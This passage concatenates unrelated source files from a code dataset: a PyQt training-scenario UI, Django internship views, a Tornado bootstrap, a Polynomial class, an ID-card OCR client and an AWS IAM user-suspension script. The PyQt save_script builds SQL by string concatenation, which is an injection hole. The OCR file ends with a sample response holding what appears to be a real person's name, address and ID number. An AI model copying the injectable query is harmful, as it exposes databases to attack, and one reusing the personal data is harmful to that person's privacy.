self.ui.treeWidget.itemClicked.connect(lambda: self.show_tasks(QtWidgets.QTreeWidgetItem, int))\n wdg_save_script.saveSignal.connect(self.save_script)\n self.__date_timer.timeout.connect(self.__update_time)\n recorded_scripts.trainingLoadedSignal.connect(self.script_track.load)\n recorded_scripts.sayTrainingName.connect(self.__set_script_name)\n self.script_track.tasklinkLoadedSignal.connect(recorded_scripts.progressbar_increment)\n self.script_track.script_timer.timeout.connect(self.__update_script_time)\n self.script_track.resizedSignal.connect(self.__resize_widget_content)\n\n self.ui.date_oper.dateTimeChanged.connect(self.signalOperDateChanged)\n\n def __update_time(self):\n self.ui.date_current.setDate(QtCore.QDate.currentDate())\n self.ui.date_current.setTime(QtCore.QTime.currentTime())\n\n self.ui.date_oper.setTime(self.ui.date_oper.time().addSecs(1))\n\n def __update_script_time(self):\n self.ui.time_script.setTime(self.script_track.time_since_start)\n self.__check_bounds()\n\n def __get_visible_area(self):\n x = self.script_track.visibleRegion().boundingRect().x()\n width = self.script_track.visibleRegion().boundingRect().width() / 2\n return x, width\n\n def __set_script_name(self, name):\n self.ui.lb_script_name.setText((name))\n\n def __set_script_status(self, status):\n self.ui.lb_script_status.setText((status))\n\n def __resize_widget_content(self, size):\n self.ui.script_widget_content.resize(size)\n\n def __center(self):\n line_pos = self.script_track.time_to_pixels(self.script_track.time_since_start, self.script_track.scale)\n self.ui.scroll_area_script.horizontalScrollBar().setValue(line_pos - self.__get_visible_area()[1])\n\n def __check_bounds(self):\n line_pos = self.script_track.time_to_pixels(self.script_track.time_since_start, self.script_track.scale)\n if line_pos >= self.__get_visible_area()[0] + self.__get_visible_area()[1]:\n self.ui.scroll_area_script.horizontalScrollBar().setValue(\n self.ui.scroll_area_script.horizontalScrollBar().value() + 1)\n\n def set_enabled(self, flag):\n self.ui.frame_tasks.setEnabled(flag)\n self.ui.bt_load.setEnabled(flag)\n self.script_track.clear()\n\n @QtCore.pyqtSlot()\n def on_bt_exit_clicked(self):\n self.close()\n\n @QtCore.pyqtSlot(bool)\n def on_bt_play_clicked(self, state):\n if state:\n if len(self.script_track.get_tasks()) == 0:\n warning.show(u\"Сценарий пуст!\")\n self.ui.bt_play.setChecked(False)\n return\n self.script_track.perform()\n self.__set_script_status(u\"выполняется\")\n GV.report.add_new_report(GV.report.ReportType.script_started, self.ui.lb_script_name.text())\n else:\n self.script_track.pause()\n self.__set_script_status(u\"пауза\")\n GV.report.add_new_report(GV.report.ReportType.script_paused, self.ui.lb_script_name.text())\n\n @QtCore.pyqtSlot()\n def on_bt_stop_clicked(self):\n self.script_track.stop()\n self.ui.bt_play.setChecked(False)\n self.__set_script_status(u\"остановлен\")\n self.ui.time_script.setTime(QtCore.QTime(0, 0, 0, 0))\n self.script_track.time_since_start = QtCore.QTime(0, 0, 0, 0)\n GV.report.add_new_report(GV.report.ReportType.script_stoped, self.ui.lb_script_name.text())\n\n @QtCore.pyqtSlot()\n def on_bt_save_clicked(self):\n if len(self.script_track.get_tasks()) == 0:\n warning.show(u\"Добавьте хотя бы одну учебную задачу на план-график!\")\n return\n wdg_save_script.show()\n\n @QtCore.pyqtSlot()\n def on_bt_load_clicked(self):\n if len(self.script_track.get_tasks())>0:\n ret = warning.show(u\"Загрузка сохраненного сценария приведет к удалению учебных задач,\"\n u\" находящихся на 
план-графике в данный момент!\", 1)\n if ret == QtWidgets.QMessageBox.Cancel:\n return\n if self.script_track.is_performed():\n warning.show(u\"Для изменения сценария необходимо остановить его выполнение!\")\n return\n recorded_scripts.show()\n\n @QtCore.pyqtSlot()\n def on_bt_clear_clicked(self):\n ret = warning.show(u\"Очистить план-график?\", 1)\n if ret == QtWidgets.QMessageBox.Ok:\n self.script_track.clear()\n self.__set_script_name(u\"несохраненный сценарий\")\n\n @QtCore.pyqtSlot()\n def on_bt_fwd_clicked(self):\n width = self.script_track.visibleRegion().boundingRect().width() / 2\n self.ui.scroll_area_script.horizontalScrollBar().setValue(\n self.ui.scroll_area_script.horizontalScrollBar().value() + width)\n\n @QtCore.pyqtSlot()\n def on_bt_rew_clicked(self):\n width = self.script_track.visibleRegion().boundingRect().width() / 2\n self.ui.scroll_area_script.horizontalScrollBar().setValue(\n self.ui.scroll_area_script.horizontalScrollBar().value() - width)\n\n @QtCore.pyqtSlot()\n def on_bt_center_clicked(self):\n self.__center()\n\n @QtCore.pyqtSlot()\n def on_bt_zoom_in_clicked(self):\n self.script_track.scale_track(self.script_track.scale + 1)\n self.__center()\n\n @QtCore.pyqtSlot()\n def on_bt_zoom_out_clicked(self):\n self.script_track.scale_track(self.script_track.scale - 1)\n self.__center()\n\n\n # def add_imitator_item(self, caption, idel, parent=None):\n def add_imitator_item(self, caption, parent=None):\n #print 'add_imitator:', parent\n item = TreeWidgetItem(parent)\n item.setText(0, caption)\n self.ui.treeWidget.insertTopLevelItem(0, item)\n return item\n\n\n def add_devices_item(self, caption, parent=None):\n item = TreeWidgetItem(parent)\n item.setText(1, caption)\n self.ui.treeWidget.insertTopLevelItem(1, item)\n return item\n\n\n def add_task_item(self, parent_item, caption, task):\n self.script_track.dict_tasks[task.id()] = task # таски на треке нужны для коннекта с линками\n task_link = TaskLink(self.ui.scrollAreaWidgetContents, task)\n task_link.hide()\n parent_item.add_task(task_link)\n\n\n def show_tasks(self, tree_item, column):\n for x in self.ui.scrollAreaWidgetContents.findChildren(TaskLink):\n x.hide()\n x = 10\n y = 10\n width = 0\n for task in tree_item.list_tasks:\n assert isinstance(task, TaskLink)\n task.set_coordinates(x, y, False)\n y += task.height() + 10\n if width < task.width():\n width = task.width()\n if task.property_widget is None:\n task.hide_settings()\n task.show()\n self.ui.scrollAreaWidgetContents.resize(width + 10, y)\n if len(tree_item.list_tasks) > 0:\n tree_item.list_tasks[len(tree_item.list_tasks)-1].to_long_signal.connect(self.new_height)\n\n def new_height(self, h):\n self.ui.scrollAreaWidgetContents.resize(self.ui.scrollAreaWidgetContents.width(), self.ui.scrollAreaWidgetContents.height()+h)\n\n def save_script(self, name):\n GV.db_cursor.execute(u'INSERT INTO TRAININGS (date, name) VALUES(\"' +\n (QtCore.QDate.currentDate().toString(\"dd.MM.yyyy\")) + '\",\"' + (name)+'\")')\n lid = GV.db_cursor.lastrowid\n GV.db_connect.commit()\n\n for task_link in self.script_track.get_tasks():\n\n params = pickle.dumps(task_link.get_current_properties_values())\n params_b = base64.encodestring(params)\n\n GV.db_cursor.execute('INSERT INTO TASKS_IN_TRAINING (text, time, y, id_training, id_task, task_params) '\n 'VALUES(\"' + (task_link.get_caption()) +\n '\",\"' + (task_link.time().toString()) +\n '\",' + (task_link.pos().y()) +\n ',' + (lid) +\n ',\"' + (task_link.get_id()) +\n '\",\"' + (params_b) + '\")')\n\n GV.db_connect.commit()\n\n 
self.__set_script_name(name)\n GV.report.add_new_report(GV.report.ReportType.script_saved, name)\n\n\n\n","sub_path":"common_blocks/PRZ/prz_modules/training_script_package/training_script.py","file_name":"training_script.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"2678871","text":"def print_rangoli(n):\n # your code goes here\n lists= [chr(n) for n in range(ord('a'),ord('z')+1)] \n L = []\n for i in range(n):\n s = \"-\".join(lists[i:n])\n L.append((s[::-1]+s[1:]).center(4*n-3,'-'))\n\n print(\"\\n\".join(L[::-1]+L[1:n]))\n\n\n\n\n","sub_path":"hackerrank/strings/alphabet-reangoli.py","file_name":"alphabet-reangoli.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"65604306","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom .serializers import *\nfrom internships.models import Internships\nfrom users.models import User\nfrom django.core.mail import send_mail\nfrom django.core import mail\nfrom django.http import HttpResponse\n\ntilde = \"%next%\"\nsep = \"%parting_string%\"\n\n\nclass UpdateProfile(APIView): \n def post(self, request):\n request.user.cv = request.data['cv']\n request.user.phone = request.data['phone']\n request.user.skype = request.data['skype']\n request.user.save()\n return Response({})\n\nclass AddBookmark(APIView):\n def post(self, request):\n bookmark_list = request.user.my_bookmarks.split(tilde)\n if request.data['pTitle'] not in bookmark_list:\n request.user.my_bookmarks += request.data['pTitle'] + tilde\n request.user.save()\n return Response({})\n\nclass RemoveBookmark(APIView):\n def post(self, request):\n arr = request.user.my_bookmarks.split(tilde)\n request.user.my_bookmarks = \"%next%\"\n for ptit in arr:\n if ptit == \"\":\n arr.remove(ptit)\n \n for x in range(len(arr)):\n if request.data['pTitle'] == arr[x]:\n arr.pop(x)\n break\n \n\n if not arr:\n request.user.my_bookmarks = \"%next%\"\n request.user.save()\n else:\n for x in range(len(arr)):\n request.user.my_bookmarks += arr[x] + tilde\n request.user.save()\n \n \n return Response({})\n\n\nclass MyAccepted(APIView):\n def get(self, request):\n\n request.user.my_accepted = tilde\n\n declared_projects = Internships.objects.filter(status='DC')\n for proje in declared_projects:\n email_string = proje.space_seperated_emails_of_selected_students\n email_list = email_string.split(' ')\n for e_mail in email_list:\n if request.user.email == e_mail:\n #title_look_up_3 = request.user.my_accepted.split('~')\n #new variable proje_title\n #proje_title = proje.title\n #if proje_title not in title_look_up_3:\n request.user.my_accepted += proje.title + tilde\n app_array = request.user.my_applications.split(tilde)\n acc_array = request.user.my_accepted.split(tilde)\n\n for pro in acc_array:\n if pro in app_array:\n app_array.remove(pro)\n string_to_set_app = tilde\n for pro in app_array:\n if pro != \"\":\n string_to_set_app += pro + tilde\n request.user.my_applications = string_to_set_app\n request.user.save()\n\n str_to_ret = \"\"\n title_look_up_2 = request.user.my_accepted.split(tilde)\n for tit in title_look_up_2:\n if tit != \"\":\n proj = Internships.objects.filter(title=tit)\n str_to_ret += 
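# The bookmark views above all round-trip one '%next%'-delimited string. A
# hedged pair of helpers capturing the same encode/decode convention (leading
# marker, one trailing marker per title, empty segments dropped):
TILDE = "%next%"

def decode_titles(raw):
    return [t for t in raw.split(TILDE) if t]

def encode_titles(titles):
    return TILDE + "".join(t + TILDE for t in titles)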
proj.values('title')[0]['title'] + sep + proj.values('university')[0]['university'] + sep + str(proj.values('deadline')[0]['deadline']) + tilde\n\n return HttpResponse(str_to_ret)\n\n\nclass MyApplications(APIView):\n def get(self, request):\n str_to_ret = \"\"\n title_look_up_0 = request.user.my_applications.split(tilde)\n for tit in title_look_up_0:\n if tit != \"\":\n proj = Internships.objects.filter(title=tit, status='OP')\n if proj:\n str_to_ret += proj.values('title')[0]['title'] + sep + proj.values('university')[0]['university'] + sep + str(proj.values('deadline')[0]['deadline']) + tilde\n\n return HttpResponse(str_to_ret)\n\nclass ApplyToTheProject(APIView):\n def post(self, request):\n\n # request.user.my_applications=\"\"\n # request.user.save()\n\n title_look_up_1 = request.user.my_applications.split(tilde)\n project_title = request.data['pTitle']\n if project_title not in title_look_up_1:\n pemail = Internships.objects.filter(title=project_title)\n stuff = pemail.values('one_contact_email')\n #print(stuff[0]['contact_email']) DO_NOT_EDIT\n my_app_string = request.user.my_applications + request.data['pTitle'] + tilde\n request.user.my_applications = my_app_string\n\n request.user.save()\n\n internship_email = stuff[0]['one_contact_email']\n proposal_text = request.data['proposal']\n student_name = request.user.name\n student_email = request.user.email\n student_mobile = request.user.phone\n student_resume = request.user.cv\n\n #SEND AN EMAIL\n subject = request.data['pTitle'] + ' Student info. for application to project'\n message = \"APPLICANT'S NAME : \" + student_name + \" | MOBILE NO.: \" + student_mobile + \" | EMAIL ID: \" + student_email + \" | Link to student's resume: \" + student_resume + \" | Student's message: \" + proposal_text\n email_from = 'ircell@iitr.ac.in'\n recipient_list = [internship_email]\n send_mail(subject, message, email_from, recipient_list)\n\n\n else:\n print(\"user has already submitted for this project\")\n\n\n\n\n\n\n # app_string = cs_list_app + request.data['title_of_project'] + \"~\"\n #request.user.my_applications = app_string\n #request.user.save()\n\n return Response({})\n\n\nclass GetProfileData(APIView):\n def get(self, request):\n content = {\n 'name': request.user.name,\n 'dept': request.user.dept,\n 'enrol_no': request.user.enrl_no,\n 'email': request.user.email,\n 'year': request.user.year,\n 'phone': request.user.phone,\n 'skype': request.user.skype,\n 'cv': request.user.cv,\n\n }\n return Response(content)\n\nclass LoginView(APIView):\n permission_classes = ()\n\n def post(self, request):\n serializer = LoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n\n content = {\n 'token': token.key,\n 'full_name': user.get_full_name(),\n 'short_name': user.get_short_name(),\n 'email': user.email,\n }\n return Response(content)\n\n\nclass LogoutView(APIView):\n def get(self, request):\n content = {\n 'status': 'Successfully Logged Out',\n }\n return Response(content)\n\n\nclass ChangePassword(APIView):\n def post(self, request):\n serializer = ChangePasswordSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n user = authenticate(email=User.objects.get(id=request.user.id).email, password=request.POST['password'])\n if not user:\n content = {\n 'status': 'Invalid Credentials',\n }\n return Response(content, status=status.HTTP_403_FORBIDDEN)\n else:\n 
user.set_password(request.POST['newpassword'])\n                user.save()\n                content = {\n                    'status': 'Password Changed Successfully'\n                }\n                return Response(content)\n        else:\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RegisterView(APIView):\n    permission_classes = ()\n    password = serializers.CharField(write_only=True)\n\n    def post(self, request):\n        serializer = RegisterSerializer(data=request.data)\n        if serializer.is_valid(raise_exception=True):\n            user = serializer.save()\n            token, created = Token.objects.get_or_create(user=user)\n            content = {\n                'token': token.key,\n                'full_name': user.get_full_name(),\n                'short_name': user.get_short_name(),\n                'email': user.email,\n            }\n            return Response(content)\n        else:\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"277028508","text":"from opengever.base.viewlets.byline import BylineBase\nfrom opengever.contact import _\nfrom Products.CMFPlone import PloneMessageFactory as PMF\n\n\nclass ContactByline(BylineBase):\n\n    def get_items(self):\n        return [\n            {'class': 'sequenceNumber',\n             'label': _('label_sequence_number', default='Sequence Number'),\n             'content': self.context.model.contact_id,\n             'replace': False},\n\n            {'class': 'active',\n             'label': _('label_active', default='Active'),\n             'content': self.active_label(),\n             'replace': False}\n        ]\n\n    def active_label(self):\n        if self.context.model.is_active:\n            return PMF('Yes')\n        return PMF('No')\n","sub_path":"opengever/contact/browser/byline.py","file_name":"byline.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"428016149","text":"# coding:utf-8\n\n# This project follows xtg20121013's blog project on GitHub, to learn the Tornado framework; many thanks!\n# This project's GitHub: https://github.com/linkwanggo/blog\n# Original author's GitHub: https://github.com/xtg20121013/blog_xtg\n\n\nimport os\nimport log_config\nfrom config import config\nfrom tornado.options import options\nimport tornado.web\nimport tornado.ioloop\nimport concurrent.futures\n\nfrom url_mapping import url_mapping\nfrom config import db_settings, redis_session_config, redis_pub_sub_config, site_cache_config\nfrom service.pubsub_service import PubSubService\nfrom extends.session_tornadis import SessionManager\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom extends.cache_tornadis import CacheManager\n\nimport logging\n\nlogger = logging.getLogger('main')\n\n# Basic site configuration / Tornado server settings\nsettings = dict(\n    template_path=os.path.join(os.path.dirname(__file__), \"template\"),\n    static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n    debug=config.get(\"debug\", True),\n    compress_response=config.get(\"compress_response\", True),\n    xsrf_cookies=config.get(\"xsrf_cookies\", \"linkwang\"),  # xsrf relaxed for now so Postman can submit POST requests\n    login_url=config.get(\"login_url\"),\n    cookie_secret=config.get(\"cookie_secret\")\n)\n\n\ndef db_poll_init():\n    \"\"\"Initialize the MySQL database connection pool\"\"\"\n    engine = create_engine(db_settings['engine_url'], encoding='utf8', **db_settings['engine_config'])\n    db_poll = sessionmaker(bind=engine)\n    return db_poll\n\n\ndef cache_manager_init():\n    \"\"\"Initialize the cache_manager\"\"\"\n    cache_manager = CacheManager(site_cache_config)\n    return cache_manager\n\n\n# Application startup class. Site initialization can be done in the constructor\n# (database connection pool, site config, async thread pool, site cache, etc.)\nclass 
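# LoginView above hands out a DRF token that later requests present in the
# Authorization header. A hedged client-side sketch (host, paths and
# credentials are placeholders, not taken from the source):
import requests

resp = requests.post("http://localhost:8000/login/",
                     data={"email": "student@example.com", "password": "secret"})
token = resp.json()["token"]
profile = requests.get("http://localhost:8000/profile/",
                       headers={"Authorization": "Token " + token})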
Application(tornado.web.Application):\n    def __init__(self):\n        super(Application, self).__init__(url_mapping, **settings)\n        self.session_manager = SessionManager(options=redis_session_config)\n        self.thread_executor = concurrent.futures.ThreadPoolExecutor(max_workers=config['max_thread'])\n        self.db_poll = db_poll_init()\n        self.cache_manager = cache_manager_init()\n        self.pub_manager = None\n\n\nif __name__ == '__main__':\n    options.define('port', default=config['default_server_port'], help='run server on a specific port', type=int)\n    options.define('console_log', default=False, help='print log to console', type=bool)\n    options.define('file_log', default=True, help='print log to file', type=bool)\n    options.define('file_log_path', default=log_config.FILE['log_path'], help='path of log_file', type=str)\n    # the cluster should have at most one master instance; the master usually runs the global scheduled tasks\n    options.define('master', default=config['default_master'], help='is master node?(true:master | false:slave)', type=bool)\n    options.logging = None\n    # read the command-line arguments passed at startup\n    options.parse_command_line()\n    # set up logging\n    log_config.init(options.port, options.console_log, options.file_log, options.file_log_path)\n\n    # create the app and ioloop\n    app = Application()\n    app.listen(options.port)\n    loop = tornado.ioloop.IOLoop.current()\n    pub_manager = PubSubService(redis_pub_sub_config, app, loop)\n    pub_manager.long_listen()  # each incoming request triggers a site-subscription refresh\n    app.pub_manager = pub_manager\n    loop.start()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"128224752","text":"import math\nclass Polynomial:\n\n    def __init__(self, coefficients):\n        self.table = coefficients\n\n    def degree(self):\n        theDegree = -1\n        for i in range(0, len(self.table)):\n            # print self.table[i]\n            if self.table[i] != 0:\n                # print \"set the value to the one above\"\n                theDegree = i\n        return theDegree\n\n    def coefficients(self):\n        return self.table  # was `return table`, a NameError\n\n    def __call__(self, x):\n        counter = 0\n        counter2 = 0\n        for index in self.table:\n            counter += index * pow((x), counter2)\n            counter2 += 1\n        return counter\n\n    def __add__(self, p):\n        addTable = []\n\n        if isinstance(p, int):\n            for tmp in self.table:\n                if tmp != 0:\n                    addTable.append(tmp + p)\n                else:\n                    addTable.append(0)\n            return Polynomial(addTable)\n        elif not (isinstance(p, Polynomial) or isinstance(p, int)):\n            raise ArithmeticError\n\n        for tmp in self.table:\n            addTable.append(tmp)\n\n        for i, j in enumerate(p.table):\n            ''' where i is the index and j is the value '''\n            if i > len(addTable) - 1:\n                addTable.append(j)\n            else:\n                addTable[i] += j\n\n        return Polynomial(addTable)\n\n    def __sub__(self, p):\n        subTable = []\n\n        if isinstance(p, int):\n            for tmp in self.table:\n                if tmp != 0:\n                    subTable.append(tmp - p)\n                else:\n                    subTable.append(0)\n            return Polynomial(subTable)  # was addTable, a NameError in this branch\n        elif not (isinstance(p, Polynomial) or isinstance(p, int)):\n            raise ArithmeticError\n\n        for tmp in self.table:\n            subTable.append(tmp)\n\n        for i, j in enumerate(p.table):\n            ''' where i is the index and j is the value '''\n            if i > len(subTable) - 1:\n                subTable.append(-j)  # was append(i); subtracting a higher-order term of p\n            else:\n                subTable[i] -= j\n\n        return Polynomial(subTable)\n\n    def __mul__(self, c):\n        if not isinstance(c, int):\n            raise ArithmeticError  # was `return ArithmeticError`\n\n        mulTable = []\n        for tmp in self.table:\n            mulTable.append(tmp * c)\n\n        return Polynomial(mulTable)\n\n    def __rmul__(self, c):\n\n        mulTable = []\n        for tmp in self.table:\n            mulTable.append(tmp * c)\n\n        return Polynomial(mulTable)\n\n    def __repr__(self):\n        rep = \"\"\n        notFirst = False\n        for i in 
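# Polynomial.__call__ above evaluates sum(c_i * x**i) term by term; Horner's
# rule yields the same value with one multiply-add per coefficient. A hedged
# standalone sketch:
def horner(coefficients, x):
    acc = 0
    for c in reversed(coefficients):
        acc = acc * x + c
    return acc

# e.g. horner([1, 2, 1], 7) == 1 + 2*7 + 7**2 == 64, matching Polynomial([1, 2, 1])(7)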
reversed(range(0,len(self.table))):\n if self.table[i] != 0:\n if self.table[i] > 0 and i != len(self.table)-1:\n if notFirst:\n rep += \" + \"\n if i != 0:\n if self.table[i] != 1:\n rep += str(self.table[i])\n rep += \"x\"\n if i != 1:\n rep += \"^\"+str(i)\n notFirst = True\n else:\n rep += str(self.table[i])\n notFirst = True\n\n return rep\n\n def __eq__(self, p):\n if len(self.table) != len(p.table):\n return False\n for i, j in enumerate(self.table):\n ''' hvor i er index og j er innhold '''\n if j != p.table[i]:\n return False\n\n return True\n\ndef sample_usage():\n p = Polynomial([1, 2, 1]) # 1 + 2x + x^2\n q = Polynomial([9, 5, 0, 6]) # 9 + 5x + 6x^3\n \n \n print(\"The value of {} at {} is {}\".format(p, 7, p(7)))\n\n print(\"The coefficients of {} are {}\".format(p, p.coefficients()))\n\n \n print(\"\\nAdding {} and {} yields {}\".format(p, q, p+q))\n\n p, q, r = map(Polynomial,\n [\n [1, 0, 1], [0, 2, 0], [1, 2, 1]\n ]\n )\n \n print(\"\\nWill adding {} and {} be the same as {}? Answer: {}\".format(\n p, q, r, p+q == r\n ))\n print(\"\\nIs {} - {} the same as {}? Answer: {}\".format(\n p, q, r, p-q == r\n ))","sub_path":"INF3331/assignment3/polynomials.py","file_name":"polynomials.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"76832809","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n 讯飞身份证OCR接口\n documents https://www.xfyun.cn/doc/words/idCardRecg/API.html#%E6%8E%A5%E5%8F%A3%E8%BF%94%E5%9B%9E%E5%8F%82%E6%95%B0\n\"\"\"\n\n__author__ = 'Van23qf'\n\n\nimport requests\nimport time\nimport hashlib\nimport base64\nimport json\n\nfrom system import global_dict\n\n\n# 身份证识别接口接入地址\nURL = \"http://webapi.xfyun.cn/v1/service/v1/ocr/idcard\"\n\n\ndef getHeader():\n api_config = global_dict.get_value(\"api_config\")\n # 应用APPID(必须为webapi类型应用,并开通身份证识别服务,参考帖子如何创建一个webapi应用:http://bbs.xfyun.cn/forum.php?mod=viewthread&tid=36481)\n APPID = api_config['appid']\n # 接口密钥(webapi类型应用开通身份证识别服务后,控制台--我的应用---身份证识别---相应服务的apikey)\n API_KEY = api_config['appsecret']\n curTime = str(int(time.time()))\n param = {\"engine_type\": \"idcard\", \"head_portrait\": \"0\"}\n param = json.dumps(param)\n paramBase64 = base64.b64encode(param.encode('utf-8'))\n m2 = hashlib.md5()\n str1 = API_KEY + curTime + str(paramBase64,'utf-8')\n m2.update(str1.encode('utf-8'))\n checkSum = m2.hexdigest()\n # 组装http请求头\n header = {\n 'X-CurTime': curTime,\n 'X-Param': paramBase64,\n 'X-Appid': APPID,\n 'X-CheckSum': checkSum,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',\n }\n return header\n\n\ndef ocr(file, side='front'):\n try:\n f1_base64 = str(base64.b64encode(file), 'utf-8')\n\n data = {\n 'image': f1_base64\n }\n r = requests.post(URL, data=data, headers=getHeader())\n result = json.loads(str(r.content, 'utf-8'))\n if result['code'] != \"0\":\n #return {'status': False, 'msg': result['code'] + ':' + result['desc']}\n return {'status': False, 'msg': '当前身份证照片不合法'}\n if result['data']['error_code'] != 0:\n #return {'status': False, 'msg': str(result['data']['error_code']) + ':' + result['data']['error_msg']}\n return {'status': False, 'msg': '当前身份证照片不合法'}\n if result['data']['type'] != '第二代身份证背面' and result['data']['type'] != '第二代身份证' and result['data']['type'] != '身份证正反面或临时身份证':\n #return {'status': False, 'msg': '识别失败:' + str(r.content, 'utf-8')}\n return {'status': False, 'msg': '当前身份证照片不合法'}\n msg = 'success'\n if result['data']['type'] == '第二代身份证':\n return {\n 'status': 
True,\n 'msg': msg,\n 'data': {\n 'side': 'front',\n 'name': result['data']['name'],\n 'gender': result['data']['sex'],\n 'nation': result['data']['people'],\n 'birth': result['data']['birthday'].replace('年', '-').replace('月', '-').replace('日', ''),\n 'address': result['data']['address'],\n 'idnum': result['data']['id_number'],\n }\n }\n elif result['data']['type'] == '身份证正反面或临时身份证':\n return {\n 'status': True,\n 'msg': msg,\n 'data': {\n 'side': 'temp',\n 'name': result['data']['name'],\n 'gender': result['data']['sex'],\n 'nation': result['data']['people'],\n 'birth': result['data']['birthday'].replace('年', '-').replace('月', '-').replace('日', ''),\n 'address': result['data']['address'],\n 'idnum': result['data']['id_number'],\n 'authority': result['data']['issue_authority'],\n 'validity': result['data']['validity'],\n }\n }\n else:\n return {\n 'status': True,\n 'msg': msg,\n 'data': {\n 'side': 'back',\n 'authority': result['data']['issue_authority'],\n 'validity': result['data']['validity'],\n }\n }\n except FileNotFoundError as err:\n return {'status': False, 'msg': err.strerror}\n\n\nif __name__ == '__main__':\n result = ocr('../uploads/zhe.jpeg', 'front')\n print(result)\n\n\"\"\"\n{\"code\":\"0\",\"data\":{\"address\":\"湖北省红安县杏花乡嶂山村靠山店\",\"birthday\":\"1992年6月23日\",\"border_covered\":false,\"complete\":true,\"error_code\":0,\"error_msg\":\"OK\",\"gray_image\":false,\"head_blurred\":false,\"head_covered\":false,\"id_number\":\"421122199206231036\",\"issue_authority\":\"\",\"name\":\"秦凡\",\"people\":\"汉\",\"sex\":\"男\",\"time_cost\":{\"preprocess\":148,\"recognize\":258},\"type\":\"第二代身份证\",\"validity\":\"\"},\"desc\":\"success\",\"sid\":\"wcr000602fc@gz88bb11707e81463000\"}\n\n\"\"\"","sub_path":"api/XunfeiIdcardOCR.py","file_name":"XunfeiIdcardOCR.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"418276323","text":"def main():\n cc = int(input())\n \n for i in range(cc):\n n = int(input())\n nums = [int(x) for x in input().split()]\n nums_set = set(nums)\n\n cnt_max = 0\n for num in nums_set:\n if nums.count(num) > cnt_max:\n cnt_max = nums.count(num)\n\n if cnt_max > n//2:\n cnt_max = n//2\n print(cnt_max)\n\n\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"codeforces/contests/round_634_div_3/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"499805495","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\n\n# Preparing learning data set.\ndf = pd.read_csv('data.txt', header=None)\nX = df.iloc[0:100, [0,2]].values\n\n# Displaying data.\nstyle.use('fivethirtyeight')\nplt.scatter(X[:50, 0], X[:50, 1], color='red', marker='o', label='Setosa')\nplt.scatter(X[50:100, 0], X[50:100, 1], color='blue', marker='x', label='Versicolor')\nplt.xlabel('Sepal length [cm]')\nplt.ylabel('Petal length [cm]')\nplt.legend(loc='upper left')\nplt.title('Data set')\n\nplt.show()","sub_path":"classification/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"593399807","text":"#!/usr/bin/env python3\n\nimport sys\nimport boto3\nfrom boto3.session import Session\nimport datetime\nfrom pytz import timezone\n\n\nif(len(sys.argv) != 2):\n print(sys.argv[0] + ' [aws cli profile name]')\n 
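# The request signature built in getHeader() above is
# MD5(API_KEY + curTime + base64(param)). A hedged standalone restatement of
# just that checksum step (the key is a placeholder):
import base64, hashlib, json, time

api_key = "YOUR_API_KEY"
cur_time = str(int(time.time()))
param_b64 = base64.b64encode(json.dumps({"engine_type": "idcard", "head_portrait": "0"}).encode("utf-8"))
checksum = hashlib.md5((api_key + cur_time + param_b64.decode("utf-8")).encode("utf-8")).hexdigest()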
sys.exit()\n\n\ntry:\n    session = Session(profile_name=sys.argv[1])\nexcept Exception as e:\n    print('\\n' + 'Profile Errors: ' + str(e) + '\\n')\n    sys.exit()\n\n\niam = session.client('iam')\n\n\ndef get_users():\n    user_lists = []\n    res = iam.list_users()\n    for lists in res['Users']:\n        userlist = lists['UserName']\n        user_lists.append(userlist)\n    return user_lists\n\n\ndef check_create_date(username):\n    res = iam.get_user(UserName=username)\n    create_date = res['User']['CreateDate']\n    create_date = create_date.astimezone(timezone('Asia/Tokyo'))\n    return create_date\n\n\ndef get_mfa_stats(username):\n    res = iam.list_mfa_devices(UserName=username)\n    if not res['MFADevices']:\n        mfa_stats = 'MFA_False'\n    else:\n        mfa_stats = 'MFA_True'\n    return mfa_stats\n\n\ndef check_console_login(username):\n    try:\n        iam.get_login_profile(UserName=username)\n        check_result = 'Login_Yes'\n    except Exception:\n        check_result = 'Login_No'\n    return check_result\n\n\ndef suspend_user(username):\n    update_res = []\n    delete_res = iam.delete_login_profile(UserName=username)\n    update_res.append(delete_res)\n    check_access_keys = iam.list_access_keys(UserName=username)\n    for key_lists in check_access_keys['AccessKeyMetadata']:\n        res = iam.update_access_key(UserName=username, AccessKeyId=key_lists['AccessKeyId'], Status='Inactive')\n        